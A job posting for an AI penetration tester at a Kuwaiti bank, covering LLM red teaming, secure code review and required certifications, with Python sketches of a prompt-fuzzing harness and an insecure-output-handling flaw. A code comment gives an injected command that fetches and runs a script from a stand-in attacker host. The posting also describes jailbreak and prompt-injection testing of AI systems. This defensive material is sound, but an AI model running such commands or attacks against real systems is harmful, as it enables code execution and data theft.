For a well-known Islamic bank in Kuwait, we are hiring an AI Penetration Tester to join the VMPT team and lead hands-on security testing for LLM/GenAI, ML, and AI-enabled applications (chatbots, RAG, AI agents, model APIs, and AI-assisted business workflows). The role blends traditional penetration testing, secure code review, and vulnerability assessment with AI red teaming focused on modern AI risks such as prompt injection and insecure output handling, as documented in the OWASP Top 10 for LLM Applications.
The candidate is expected to have experience assessing Python-based AI development and Azure AI / Azure OpenAI / Microsoft Foundry-hosted model endpoints.
Key Responsibilities
AI / LLM Penetration Testing & Red Teaming
- Plan and execute AI penetration tests for LLM/GenAI and ML solutions across the bank (AI apps, AI gateways, model endpoints, orchestration layers, RAG pipelines, plugins/tools).
- Design test cases aligned to OWASP Top 10 for LLM Applications (e.g., prompt injection, insecure output handling, sensitive info disclosure, supply-chain risks).
- Perform adversarial testing using threat-informed techniques and references such as MITRE ATLAS (adversary tactics/techniques for AI systems).
- Validate the security of agentic workflows (tool invocation, function calling, permissions, memory, connectors) and verify least-privilege and authorization boundaries.
Automation & Tooling
- Build Python-based test harnesses for repeatable AI security testing (fuzzing prompts, jailbreak suites, regression tests, evaluation scoring); see the sketch after this list.
- Use and extend PyRIT (Python Risk Identification Tool) or equivalent frameworks to probe for jailbreaks/harms and automate adversarial scanning.
- Where applicable, leverage Microsoft Foundry capabilities such as the AI Red Teaming Agent (preview) that integrates PyRIT red teaming features.
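To give candidates a concrete sense of the kind of harness meant above, here is a minimal, illustrative sketch (not part of the role requirements). It assumes an Azure OpenAI-style chat-completions endpoint; the resource name, deployment, API version, key environment variable, prompt file, and leak-detection patterns are all placeholder assumptions, not details of the bank's environment.

```python
"""Minimal prompt-fuzzing harness sketch (illustrative only).

Assumptions: an Azure OpenAI-style chat-completions endpoint, an API key in
the AZURE_OPENAI_KEY environment variable, and a hypothetical list of
adversarial prompts in attack_prompts.txt.
"""
import os
import re
import requests

ENDPOINT = "https://example-resource.openai.azure.com"   # placeholder
DEPLOYMENT = "example-deployment"                         # placeholder
API_VERSION = "2024-06-01"                                # placeholder
URL = f"{ENDPOINT}/openai/deployments/{DEPLOYMENT}/chat/completions?api-version={API_VERSION}"

# Simple indicators that a jailbreak / data-leak prompt may have succeeded.
LEAK_PATTERNS = [re.compile(p, re.I) for p in (r"system prompt", r"api[_-]?key", r"BEGIN PRIVATE KEY")]


def send_prompt(prompt: str) -> str:
    """Send one adversarial prompt and return the model's reply text."""
    resp = requests.post(
        URL,
        headers={"api-key": os.environ["AZURE_OPENAI_KEY"]},
        json={"messages": [{"role": "user", "content": prompt}], "max_tokens": 256},
        timeout=30,
    )
    resp.raise_for_status()
    return resp.json()["choices"][0]["message"]["content"]


def run_suite(path: str = "attack_prompts.txt") -> None:
    """Replay a list of attack prompts and flag suspicious responses for triage."""
    with open(path, encoding="utf-8") as fh:
        prompts = [line.strip() for line in fh if line.strip()]
    for prompt in prompts:
        reply = send_prompt(prompt)
        flagged = any(p.search(reply) for p in LEAK_PATTERNS)
        print(f"[{'FLAG' if flagged else ' ok '}] {prompt[:60]!r}")


if __name__ == "__main__":
    run_suite()
```

In practice such a harness would typically be wired into CI/CD as a regression suite and extended with PyRIT or equivalent frameworks rather than hand-rolled pattern matching.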
Secure Code Review & AppSec
- Conduct secure code review (particularly Python) for AI application layers: prompt templates, RAG retrieval logic, output post-processing, input validation, secrets handling, authZ checks, and logging.
- Identify and help fix design flaws enabling data leakage, prompt manipulation, unsafe tool usage, or insecure output flows (see the sketch after this list).
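As a hedged illustration of what an insecure output flow can look like in Python (the example is hypothetical and not drawn from any real codebase), the sketch below contrasts piping raw model output into a shell with constraining it to an allowlisted action.

```python
"""Illustrative sketch of an insecure-output-handling flaw and a safer pattern.
All names are hypothetical; the point is to never treat model output as trusted input."""
import subprocess

ALLOWED_COMMANDS = {
    "status": ["systemctl", "status", "app"],
    "disk": ["df", "-h"],
}


def run_tool_unsafe(llm_output: str) -> None:
    # FLAW: model output flows straight into a shell, so a prompt-injected
    # response like "status; curl attacker.example | sh" executes attacker code.
    subprocess.run(llm_output, shell=True)


def run_tool_safe(llm_output: str) -> None:
    # Safer: map the model's answer onto an allowlisted command, never the raw text.
    action = llm_output.strip().lower()
    if action not in ALLOWED_COMMANDS:
        raise ValueError(f"Model requested unapproved action: {action!r}")
    subprocess.run(ALLOWED_COMMANDS[action], shell=False, check=True)
```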
Traditional Penetration Testing & Vulnerability Assessment
- Perform web/API/cloud penetration testing for AI-enabled applications (auth, session, API abuse, SSRF, injection, misconfigurations, secrets).
- Run vulnerability assessments, triage findings, define severity, and validate remediation (re-test).
Education and Qualifications
- Bachelor's degree in Computer Science, Cybersecurity, Software Engineering, or a related discipline.
- 3–7 years in penetration testing / application security / red teaming.
- Demonstrated experience testing LLM/GenAI systems (prompt injection, jailbreaks, data exfiltration patterns, agent/tool abuse).
- Strong hands-on Python for security automation and test harness development.
- Practical experience with Azure security concepts (identity, networking, secrets, logging) and exposure to Azure AI / Azure OpenAI / Foundry style deployments.
- Strong report writing, clear communication, and the ability to work with developers on remediation.
Required Certifications (at least one)
- OffSec OSCP / OSCP+
- GIAC GPEN
- Microsoft Certified: Azure Security Engineer Associate (AZ-500)
- ISC2 CCSP
Strongly Preferred
- OffSec OSWE (advanced web exploitation / white-box testing)
- Burp Suite Certified Practitioner (BSCP)
- Microsoft Certified: Azure AI Engineer Associate (AI-102), which helps align with Azure AI implementation patterns.
Tools & Technologies
- Python, Git, CI/CD integration
- Burp Suite, common PT toolchains (Kali, scanners, API tooling)
- Azure security controls (identity, key management, logging/monitoring)
- AI red teaming tooling (e.g., PyRIT / Foundry scans)